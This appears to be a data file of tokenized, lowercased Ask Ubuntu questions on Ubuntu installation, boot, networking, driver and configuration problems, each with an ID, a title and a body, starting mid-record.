dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes- tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap- cgenen- chkcap- chken- capabilities : [ 140 v1 ] device serial number 00-15-00-ff-ff-62-df-09 kernel driver in use : iwlwifi i 'm completely mystified on this one . i just expected it to work and ca n't see why it is n't ! might the firmware be non-standard ? if that , i would have expected others to have a similar problem . is there something about the way i installed it that is problematic ?
351257	opencv installation problem in ubuntu 13.04	i have downloaded opencv from github . i am following the installation instruction from here . ubuntu 13.04 64bit system hangs when i run the following command ( after 25 % complete ) make -j additional information : 3.8.0-31-generic lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring
351259	error : file'/boot/grub/x86_64-efi/normal.mod ' not found	i get this error : error : file'/boot/grub/x86_64-efi/normal.mod ' not found . grub rescue > i am on a asus u38dt which came pre-installed with windows 8 and i tried to install ubuntu 13.04 instead via usb ( not dual boot ) . now my computer does n't boot into any os and i 'm a little screwed . how do i completely remove windows 8 and get ubuntu to work ?
351262	how to conveniently find local html documentation ?	there are many doc packages in the repositories which provide documentation in html . is there an easy way to find locally installed html documentation , like info or man ? i guess i should clarify this a little . the question is not about opening an html file . there are plenty of browsers out there and they do it pretty well . the question is about working with the whole farm of documentation files on my computer , html docs in particular . among /usr/share/doc/* there are man pages , info files , some plain text files and a bunch of html files . to look up information in man pages we use man utility , or info -- it looks through man too . but the situation with html docs is like if you had man pages on your computer but no man utility ! so , since there are html docs , there also could be a tool to work with them ( to search for the documentation you need etc < -- and would be nice to have fuzzy search for that ) . does such a tool exist ?
351264	after successful install of 12.04 on win7 system , boots to grub cmd line	i have installed 12.04 x64 on a second hard drive in a system which already has win7 installed on the first drive . when the installation process completed , i was prompted for a restart . i restarted and booted into win7 and modified the boot menu using easybcd . i created a boot entry for grub2 as directed . when i reboot and select the just installed 12.04 boot entry , i am presented with the grub command line . note that prior to this i successfully installed 13.04 , only to have the same issues . so i did a complete re-installation using 12.04 this time . i have also tried numerous variations on the boot load entries , using both grub and grub 2 . the variations resulted either in a blank screen or the grub prompt . for the installation , the boot device was installed on the 2nd disk as indicated in the instructions i followed for installation . i can boot win7 just fine , which is how i am able to modify the boot menu and test different variations . this is what the boot menu setting are in easybcd following normal instructions on adding an entry for the 12.04 install : there are a total of 2 entries listed in the bootloader . default : windows 7 timeout : 30 seconds easybcd boot device : c : \ entry # 1 name : windows 7 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.exe entry # 2 name : ubuntu bcd id : { 3a0cd1e9-1dbd-11e2-8e1a-9bf16ea1fb3e } drive : c : \ bootloader path : \nst\autoneogrub0.mbr what am i missing for booting to the installed version of 12.04 ? any help is much appreciated .
351267	my amd radeon is not working with ubuntu	so basically , when i installed ubuntu , i started up the computer . then , for some reason , random colors appear . in the very back of these colors , i could see the ubuntu boot up symbol for awhile . then it disappears , and the os is unusable . anyone can help ? my specs : intel core 2 duo cpu e8500 , amd raedon 6670 i scanned my computer for viruses with malwarebytes . no viruses that could be blocking the video were found .
351269	juju errors when trying to deploy to ec2	i am trying to get started with juju on ec2 . i have followed the install and configure instructions here : https : //juju.ubuntu.com/docs/ and here : https : //juju.ubuntu.com/docs/config-aws.html when i try to deploy i get $ juju -- verbose deploy mysql 2013-09-28 20:25:47 info juju.provider.ec2 ec2.go:187 opening environment `` amazon '' wordpress 2013-09-28 20:25:53 error juju supercommand.go:282 command failed : no instances found error : no instances found i have edited my .juju/environments.yaml so that the region , access-key , secret-key match my ec2 setup . i have left the admin-secret and control-bucket alone , and i have tried setting them to match the contents of the yaml file on my ec2 installation . i have also tried setting the default-series to 'precise ' . i can log in to ec2 and create instances and volumes . i also have amazon-cert.pem and amazon-private-key.pem files in my .juju folder . i have also tried installing wordpress , but get the same error . this is all happening from my osx mountain lion machine , btw . thanks , p
351270	13.04 does n't load after upgrate from 12.10 got stuck with lxde in the end	i know there are allot of questions about this subject and allot of answers and methods of solving this issue but i could n't find the solution or it did n't work i upgraded yesterday from 12.10 to 13.04 following the instructions from the main page , then upgraded to gnome 3.8 from terminal . it all seemed to work fine until this morning when i got stuck with the splash screen and a something about manual recovery or skip mounting option ( both options did n't work ) after a not so quick browsing i managed to do the following : -purged the nvidia drivers ( with 12.10 i only used nouveau since nvidia did n't work ) -removed/installed/ again removed and installed lightdm and gdm -passed the splash screen but got stuck again after inserting the password ( with a very blue edubuntu 13.04 logo ) -finally installed lxde , this worked now , lxde is fine and frankly i did n't knew my computer could work that fast but i would really love to make it work as it should . and if it does n't revert back to 12.10 as a final option . can anyone help ? thanks
351271	can not figure out how to change username through recovery mode or terminal ?	i am giving my old laptop to my brother and am trying to change everything to his name . i have tried every online tutorial i could find and nothing has worked so far . i need to change allie @ nolan 's machine : ~ $ to nolan @ nolan 's machine : ~ $
351272	mouse & audio not working properly	i am a returning linux user after spending about 3 years apart from linux . i am running ubuntu version 13.04 on my pc . i am running it alongside windows 7 with a 50 gb partition allowed for linus and 950 for windows . when in ubutu initially my mouse works perfectly fine however as soon as i open a new window i can not click anything in the window however the mouse still clicks on things in the side bar and the top bar . also i can not get either my headset nor my externall speakers to play any sound . my computers spces are : cpu : intel i5 3570k ivy-bridge gpu : evga geforce gtx 660 sc edition ram : 8 gb corsair vantage ddr3 ( running 2*2gb , 1*4gb ) mouse : madcatz rat 3 headset : logitech g35 thank you , any help will be much appreciated
351273	lts 12.04 update nvidia driver 319.32 reconfigured not able to get past login screen	i 've encountered a similar problem as nvidia driver updated - mixed versions of 304.88 and 319.32 and ubuntu 12.04 lts - black screen at boot after changing nvidia driver using what i found there , i was able to purge the nvidia version 304 and reconfigure version 319 . now my problem is that i can get to the login screen for unity , but i ca n't get past this screen . i enter my password and i just here the drum sound and the login screen comes up again .
351274	upgrade kills my wifi , so what are my options ?	i have a new hp pavilion laptop . it came pre-installed with 12.04 lts , when i did an update of my kernel , it killed my wifi , i could n't figure out why . hp people are incompetent to provide support on this issue . is there any way i could continue using lts ubuntu and keep wifi working , shall i not upgrade kernel at all ? you can see the details of the lappy here current kernel is 3.5.0-32-generic , the problem occurs when i upgrade to 3.5.0-40-generic ps : i recovered to factory default using recover option on boot ( grub list entry ) .
351278	ubuntu to disk from site for install	i have an old acer laptop with windows 2000 running on it , no access to internet . i would like to download ubuntu to a dvd with my macbook for installation on the acer . how do i do this ?
351280	use f keys instead of media keys on macbook pro on xubuntu ?	is it possible to have the function keys be the f key by default on a macbook pro with xubuntu ? i.e. , i 'd need to hold fn to use the media functions . ca n't seem to find anything googling , thanks .
351284	ubuntu web server 6 hdd raid1 and raid5	i just purchased a new dell poweredge 2950 specs : 16gb ram 6x 146 gb hdd 2x 3.0ghz quadcore xeons hardware raid setup : disk group 1 : raid 1 drive # 1 drive # 2 disk group 2 : raid 5 drive # 3 drive # 4 drive # 5 hot swappable = drive # 6 so far , so good , now for the tricky part . i understand basic ubuntu administration , and i have even been able to successfully setup a few simple ubuntu web servers . now i 'm trying to configure this machine and i 'm not sure where to start ... i would like to use the server for the following purposes.. host web applications for employees ( should be accessible via internet ) host images of the products we sell ( to be displayed on multiple sites ) host mysql database ( product information , employee info , etc . ) i would like help configuring my partitions and ( if necessary ) software raid settings . ideally , system files will reside on disk group 1 ( raid 1 ) and the web apps / db will reside on disk group 2 ( raid 5 ) any suggestions as to how this should be partitioned ? i know this is a load questions so any help is highly appreciated !
351288	mediatomb ui not working ... i 've done all the configuration.xml ?	i 'm running ubuntu server 12.04 and have recently installed mediatomb . a fter following instruction and changed the configuration.xml accordingly i have n't been able to accesses the web interface ... i have port forwarded ... but nothing happened i 've removed and then reinstalled mediatomb , install my sql and squite ... please help ed
351289	some help with my terminal	when i access the terminal it always comes out something like user @ ubuntu : ~ $ , but now after trying to install a .tar.gz driver for my printer ( my pc still does not recognize it ) , i get only ubuntu : ~ $ . in addition , the terminal used to show the elements in different colors depending on the file type , but now all the elements are in the same color , and i do not know if there is any way to get my terminal back to its previous state . and if anyone can explain me how to install this kind of file i would appreciate it so much .
351290	my locale settings are broken and i apparently dont have locale-gen	im having issues with my locale settings . i tried dpkg-reconfigure locales and it gave me the error : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us.en '' , lc_all = `` en_us.utf-8 '' , lc_messages = `` c '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory /usr/sbin/dpkg-reconfigure : locales is broken or not fully installed i tried locale-gen but i dont think i have locale-gen on my computer . i got the error command not found . i tried multiple different solutions i found in forums and askubuntu but i think i have to install locale-gen somehow and thatll fix it . how can i install locale-gen or is there another solution you think i might try ? sudo locale locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_us.utf-8 language=en_us.en lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all=en_us.utf-8
351293	there 's no boot options under legacy sources ... ?	i 'm installing ubuntu 13.04 on my hp pavillion p6 desktop with windows 8 pre-installed . i 've been having the infamous uefi errors and attempted to boot using legacy sources but there are no boot options under legacy boot sources . am i missing firmware or something ?
351294	why is my network broken , although my computer has an ip address , and firewall disabled ?	short summary ( added after the problem was solved ) apparently some wireless usb network adapter drivers were incompatible with my linux os , and in the end i worked around the problem by buying a wireless bridge ~= receiver ~= wireless access point . now , here is the actual question : question : if a computer has been provided an ip address by a broadband router , and the firewall is turned off , but internet nevertheless does n't work and it 's not even possible to ping the router , then what might the problem be ? and how can i fix it ? background : i 'm unable to connect from my desktop to [ the wireless broadband router in the appartment to which i 've just moved ] , via [ a wireless network usb card ] . the router gives me an ip address ( first it asks me to specify a wsp pin code , which i do ) , but although i get an ip address , i 'm unable to reach the internet : i can not resove any host names , and i can not even ping the broadband router , i.e . the machine that gave me the ip address ( ! ) . more information : below follows lots of hopefully helpful information . my laptop , which has always been configured via dhcp , is able to connect to the broadband router without any issues . only my desktop does n't work . it recently had bridged networking configured . here are my desktop 's interfaces , after i 've connected it to the broadband router . wlan0 ( at the end of the list ) is the network usb card . $ ip ad 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 20 : cf:30:4c:2f:02 brd ff : ff : ff : ff : ff : ff inet6 fe80 : :22cf:30ff : fe4c:2f02/64 scope link valid_lft forever preferred_lft forever ( uninteresting stuff related to kvm , vmware , virtualbox : 4 : virbr0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc noqueue state down link/ether 6e:84:3c:57:95:4a brd ff : ff : ff : ff : ff : ff inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0 5 : vmnet1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 00:50:56 : c0:00:01 brd ff : ff : ff : ff : ff : ff inet 172.16.228.1/24 brd 172.16.228.255 scope global vmnet1 inet6 fe80 : :250:56ff : fec0:1/64 scope link valid_lft forever preferred_lft forever 6 : vmnet8 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 00:50:56 : c0:00:08 brd ff : ff : ff : ff : ff : ff inet 192.168.133.1/24 brd 192.168.133.255 scope global vmnet8 inet6 fe80 : :250:56ff : fec0:8/64 scope link valid_lft forever preferred_lft forever end uninteresting stuff ) 9 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether 44:94 : fc:29:59:6e brd ff : ff : ff : ff : ff : ff inet 192.168.100.6/24 brd 192.168.100.255 scope global wlan0 < -- it has an ip addr ( ! ) inet6 fe80 : :4694 : fcff : fe29:596e/64 scope link valid_lft forever preferred_lft forever here is the routing table : ( 192.168.100 . * is the broadband router 's network ) $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.100.1 0.0.0.0 ug 0 0 0 wlan0 link-local * 255.255.0.0 u 1000 0 0 wlan0 172.16.228.0 * 255.255.255.0 u 0 0 0 vmnet1 192.168.100.0 * 255.255.255.0 u 2 0 0 wlan0 192.168.122.0 * 255.255.255.0 u 0 0 0 virbr0 192.168.133.0 * 255.255.255.0 u 0 0 0 vmnet8 here is the iptables configuration : ( it 's disabled , right ? ) $ sudo iptables -nl chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination when i ping the gateway ( 192.168.100.1 ) , and google , ping says : $ ping 192.168.100.1 ping 192.168.100.1 ( 192.168.100.1 ) 56 ( 84 ) bytes of data . from 192.168.100.6 icmp_seq=3 destination host unreachable from 192.168.100.6 icmp_seq=5 destination host unreachable from 192.168.100.6 icmp_seq=6 destination host unreachable $ ping google.com ping : unknown host google.com how is that possible ? 192.168.100.1 has given me an ip address , then it can not be `` unreachable '' ? i 'm able to ping the gateway from my laptop , so it does reply to ping requests . here is resolv.conf : ( why does it specify localhost ? ? ? ? â i suppose that 's ( parts of ) the reason google is n't ping : able ? ) $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 in the past , i had a bridged network configured in /etc/network/interfaces , but i 've commented it out , and restarted the whole computer . here are the not-commented-out lines in that file : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp i 'm using kubuntu 12.04 lts . network manager shows wlan0 as status connected . update : here 's the output from lsusb : $ lsusb bus 004 device 004 : id 05f3:0081 pi engineering , inc. kinesis integrated hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 002 : id 09da:0006 a4 tech co. , ltd optical mouse wop-35 / trust 450l optical mouse bus 004 device 005 : id 05f3:0007 pi engineering , inc. kinesis advantage pro mpc/usb keyboard bus 002 device 004 : id 0846:9021 netgear , inc . here 's output for lsusb -v but for the netgear device only : ( for all devices , lsusb -v said `` could n't open device , some information will be missing '' ) bus 002 device 004 : id 0846:9021 netgear , inc. could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x0846 netgear , inc. idproduct 0x9021 bcddevice 2.00 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 46 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 4 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1
351297	ubuntu 12.04 and pinnacle firewire card	i am running ubuntu 12.04 and have a pinncale video capture card installed . i am attempting to download a movie from my dv camera . the card is seen by the system : > lspci 02:01.0 multimedia controller : pinnacle systems inc. av/dv studio capture card 02:01.1 firewire ( ieee 1394 ) : pinnacle systems inc. device 0015 however , when i use kino or dvgrab , my camera is not found . this is specific to ubuntu as i have a dual boot with windows and things work under windows . what diagnostics can i run ?
351299	changing the size of the window minimize / maximuze / close button in ubuntu 12.04	i 'm setting up an ubuntu 12.04 pc for my 71 year old dad . i 'm trying to keep thing simple and big . i found a way to set most text , buttons and icons to large size , but there is 1 problem . the control box of a form ( minimize , maximize , close buttons ) . i can seem to find a way to change their size . the window caption font size changes , but the control box stays the same . anybody know if it 's even possible to change that ? thanks .
351300	networkmanager in disconnected state	there seems to be a problem with my network drivers . neither eth0 nor wlan0 are recognized , and i 'm running 13.04 over the 3.8.0-27-generic kernel . here 's some diagnostic information : ifconfig yields an entry for lo and some virtual ethernet bridges , but no eth0 nor wlan0 . nm-tool yields : networkmanager tool state : disconnected cat /etc/network/interfaces yields : auto lo iface lo inet loopback lshw -sanitize -c network yields : pci ( sysfs ) *-network unclaimed description : network controller product : centrino wireless-n 1030 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 34 width : 64 bits clock : 33 mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7d00000-f7d01fff *-network unclaimed description : ethernet controller product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:03:00.2 version : 0a width : 64 bits clock : 33 mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : latency=0 resources : ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff what i 've tried : i tried to connect the networkmanager tool . from other sites , i 've seen that it sometimes helps to change the file /etc/networkmanager/networkmanager.conf from : [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false to : [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=true and then doing a sudo service network-manager restart and/or rebooting the machine , but that has not worked either . any other ideas ? many thanks .
351302	unable to use tor settings in ubuntu	i use a proxy to connect to internet , and it requires authentication too . i have downloaded the extracted tor bundle for linux . vidalia starts and i can browse successfully within the firefox already bundled with the tor . but when i use socks5 proxy 127.0.0.1 and port 9050 in my normal firefox browser , i get the error : `` server not found . '' here is a screenshot of my current proxy settings : and this is what i get : i have been doing the same in windows , it works . please help here .
351303	why ca n't i mount my flash drive on ubuntu gnome 13.04	when i try to mount my flash drive ( a kingston dt 101 g2 ) , nautilus gives me this error message : error mounting /dev/sdb1 at /media/alex/b255-e6ad : command-line `mount -t `` vfat '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush '' `` /dev/sdb1 '' `` /media/alex/b255-e6ad '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so it will not let me mount the flash drive and i tried using gparted to format it to other filesystems , but it did n't work . please help !
351305	unable to install amd radeon hd 5450 on ubuntu13.04 due to no display	so here is my issue , i got ubuntu 13.04 installed on a system with the following specs : amd athlon 64 x2 5600+ nf-m2 nview fm2 3 gb ddr2 800 ram wd 250 gb hdd coolmax cug-700b 500w i can not install the graphics drivers without the card being installed , and when the card is installed , i cant see anything to install the drivers ... .help ?
351307	removed all mozilla softwares	hi wanted to remove mozilla firefox and i did sudo apt-get purge mozilla-\* it removed many other software too what are the software i need to install again
351308	lagging audio and video on ubuntu 12.04	apparently i have absolutely no idea what i 'm doing . i 'm pretty good at solving problems with windows usually , but i 'm afraid i 've made my problem worse with this os and am at a loss . i 'm also having trouble even navigating my way around my system to see what is what . it all started with slightly slow performance online and off and my machine would sort of freeze up and the screen would `` grey out '' for a few seconds , then come back . anything i would try to watch , mainly in amazon prime would be severely delayed in video and the audio would n't match up . it 's still doing all of that but seems much worse after me attempting to update my adobe flash and nvidia driver , which i do n't thing i did right anyway because i ca n't figure out how to install something after i 've downloaded it . i tried using the terminal through blog help suggestions too , but simply have no idea if i 'm using the right commands for my system and issues . please help . i 'm using an older laptop that a friend loaded with linux and gave to me . it is a latitude e5500 with intel® core™2 duo cpu p8600 @ 2.40ghz × 2 32 bit . i 'm running ubuntu 12.04 as far as i can tell .
351309	notification message when vpn gets disconnected	this question is like is it possible to add a notification message when a vpn gets connected ? . the python script in the answer there ( see below ) works ok on 13.04 , but it only notifies on making new connections , not when a vpn connection is disconnected , which is much more important since it can happen at any time . can someone please tweak the script for disconnections ? alternatively , where is the network connection ( for vpn ) tray icon held in the file system , so i can change it - the miniature padlock is so tiny it is barely visible . reversed foreground/background colours would be better . import gtk import pynotify import dbus from dbus.mainloop.glib import dbusgmainloop def vpn_connection_handler ( *args , **keywords ) : state = args [ 0 ] .get ( 'state',0 ) if state == 2 : n = pynotify.notification ( `` vpn '' , `` connection established '' ) n.show ( ) pynotify.init ( `` icon-summary-body '' ) dbus_loop = dbusgmainloop ( ) system_bus = dbus.systembus ( mainloop=dbus_loop ) system_bus.add_signal_receiver ( vpn_connection_handler , dbus_interface= '' org.freedesktop.networkmanager.vpn.connection '' , signal_name= '' propertieschanged '' ) gtk.gdk.threads_init ( ) gtk.main ( )
351311	filename substitution -- is there something to make sure it is not a certain letters ?	what is the command for getting a filename with any character except a few ? say i do not want the filename to contain the letters q and q ls [ ^qq ] does not work . what would i do ?
351317	how to rearrange queued installations in software center ?	is there a way to rearrange queued installations ( that are waiting to commence ) in the ubuntu software center ? e.g. , i would like the installation that is waiting last in the queue to be performed after the current installation has been completed , that is , i would like to `` drag '' the last waiting item to second in the list , or to rearrange the list by some other means such that all the installations occur in the sequence of my preference . can this be done ? i am using ubuntu 12.04 .
351318	changing symlink `` python '' to `` python3 '' causes problems	i have python 2.7.3 and 3.2.3 installed on my ubuntu 12.04 64bit ( by default ? ) . when i type `` python '' , i want python 3.2 instead of 2.7 . changing symlink `` python '' to link to python3 seems to cause big problems . why is that and is there a way to do that ? lrwxrwxrwx 1 root root 7 sep 28 19:15 python - > python2 lrwxrwxrwx 1 root root 9 jun 18 13:26 python2 - > python2.7 -rwxr-xr-x 1 root root 2993592 apr 10 02:46 python2.7 -rwxr-xr-x 1 root root 1652 apr 10 02:46 python2.7-config lrwxrwxrwx 1 root root 16 jun 18 13:26 python2-config - > python2.7-config lrwxrwxrwx 1 root root 9 apr 10 17:12 python3 - > python3.2 lrwxrwxrwx 1 root root 11 apr 10 02:13 python3.2 - > python3.2mu -rwxr-xr-x 1 root root 2949952 apr 10 02:13 python3.2mu lrwxrwxrwx 1 root root 11 apr 10 17:12 python3mu - > python3.2mu lrwxrwxrwx 1 root root 16 jun 18 13:26 python-config - > python2.7-config i linked python to python3 : sudo ln -fs python3 python it worked but later it forced me to change the link back because ubuntu seems not much responsive and i ca n't run most of the applications any more , such as variety , spyder , okular , software center , etc . edit : yes , the 2 answers in the marked duplicate question problems upgrading to python 3.3 and setting up django addressed half of my question , and the question itself does n't seem to be related to my question when i try to search for an answer . i doubt anyone would realize the answer is below that question .
351319	another way to fix âthe system is running in low-graphics modeâ error ?	i began having the infamous `` system running in low graphics mode '' error after my daughter turned off the power so she could boot into windows . looking at the lightdm log in in /var/log/lightdm/ showed that the greeter was failing to be created . the greeter log showed that the greeter could not create its .xauthority file .
351321	moving encrypted home folder to a new hard drive	recently i bought a new hard drive . i 'd like to turn this hard drive into the /home . during original install i set my home directory up as encrypted . at this point i dont know how to move the home folder to the new hard drive . also i dont know how to get it to automatically mount the encrypted home folder . update : i was asked to add sudo fdisk -l to this , hopefully this helps disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b8a7d device boot start end blocks id system /dev/sda1 * 2048 616775679 308386816 83 linux /dev/sda2 616775680 625141759 4183040 82 linux swap / solaris disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00027ef1 device boot start end blocks id system /dev/sdb1 2048 1953523711 976760832 83 linux
351326	how do i list word count in multiple files ?	say i need to find out how many words are in each file that have the word 'work ' in it . i know that to find files with 'work ' in it , it would be ls work . and to figure out the number of words it would be wc -w however i tried this and it seems to be just displaying the number of files , not the number of words combined in all files ( which i need ) : ls work | wc -w so say if there are 14 files that follow the 'work ' prereq , it would display 14 , not the number of words .
351330	problem about indexing files between partitions	i 'm here for talking to you about a problem . first of all sorry for being noobish but i just installed ubuntu this night . anyhow , here 's the problem : i have my pc with a double boot ubuntu+windows 8 and i installed ubuntu in a secondary partition in my 500gb hard drive . in the other partition there are my files such as music , downloads etc for my windows hard drive ( i have an ssd where is stored 8 and an hard drive where i have my files and ubuntu ) . so now i 'm trying to use my music with banshee 's library system and at the first time that i used that library i got no problems . now that i reboot ubuntu when i try to play the music the software just says that he ca n't find the file ( i suppose that ubuntu gets some time before loading files from other partitions but dunno ... ) . and the same thing happens with my dropbox folder withc is in the same partition of the music one . so , is there a way to fix this annoying problem or it 's just something that i should ignore ? anyhow , ubuntu 13.04 is installed on ext4 and my file partition on ntfs . for better understanding here a little graphic explanation about my partitions : c : - > windows 8 d : - > ubuntu partition ( e : ) my files basically the file hard drive has two partitions sorry for my english mistackes but i 'm italian thank you for the attention given to me and have a nice day
351337	help needed with eazycap ( somagic ) please !	i followed this guide easycap-somagic-wiki installing both the deb somagic-capture and the deb somagic-capture-tools packages.i skipped both source installs and the `` downloading and building git sources '' because they did n't seem to be needed.i was able to get through the `` extracting firmware '' and `` performing user space capture '' sections without any complications . i can even pass the video streaming test by running ... somagic-capture -n -- luminance=2 -- lum-aperture=3 | mplayer -vf yadif , screenshot -demuxer rawvideo -rawvideo `` ntsc : format=uyvy : fps=30000/1001 '' -aspect 16:9 - lsusb ... bus 002 device 003 : id 1c88:003c somagic , inc. smi grabber ( easycap dc60+ clone ) [ smi-2021cbe ] i 'm unable to record anything because there 's no file in the /dev folder for the easycap device for me to point vlc or mencoder to . i 'm unsure how to fix the problem or what caused it though and after hours of searching google to no avail i am in desperate need of your help .
351338	i ca n't connect to the internet using ethernet	i ca n't connect to the internet using ethernet . i am using a dell inspiron . i have a dell d500 and it connects perfectly . i have tried many things already and nothing worked . when i plug in the ethernet it does not even recognize it . is it that my hardware is to new for the drivers in ubuntu ? or is it that my hardware is broken altogether ? ( not very likely , because the router recognizes that the ethernet cord is plugged into something at the other end ) can anyone help me ? i am using ubuntu 13.04 . here is the output of nm-tool : networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : unavailable default : no hw address : 4c : eb:42:49 : ea:17 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points
351344	graphics artifacts using the hud in ubuntu with nvidia geforce 73001e	i have a samsung syncmaster 205bw monitor and an nvidia geforce 7300le graphics card . i formatted my hard drive , installed windows 7 ultimate , then installed ubuntu 13.04 . windows had no issue , when i boot the computer , the grub screen is offset to the upper left-hand corner . whenever i click on the unity search symbol my screen gets all glitchy showing several geometric visual artifacts , sometimes making it impossible to use . i went to system & updates , and none of the additional drivers that are there from the list have worked . do you have any advice ?
351345	can i move /opt partition ?	i have /opt on a separate partition . can i move it to the / partition to install windows vista ? i currently have the following setup : / partition /home partition /opt partition swap partition
351348	ubuntu 12.04 /home encryption option during installation info ?	does anyone know of a good link to info about this option ? i 've tried to google the info with much luck . like what is the name of the package used for encrypting ? key length ? algorithm used ? is it cross distro ? etc . thanks in advance
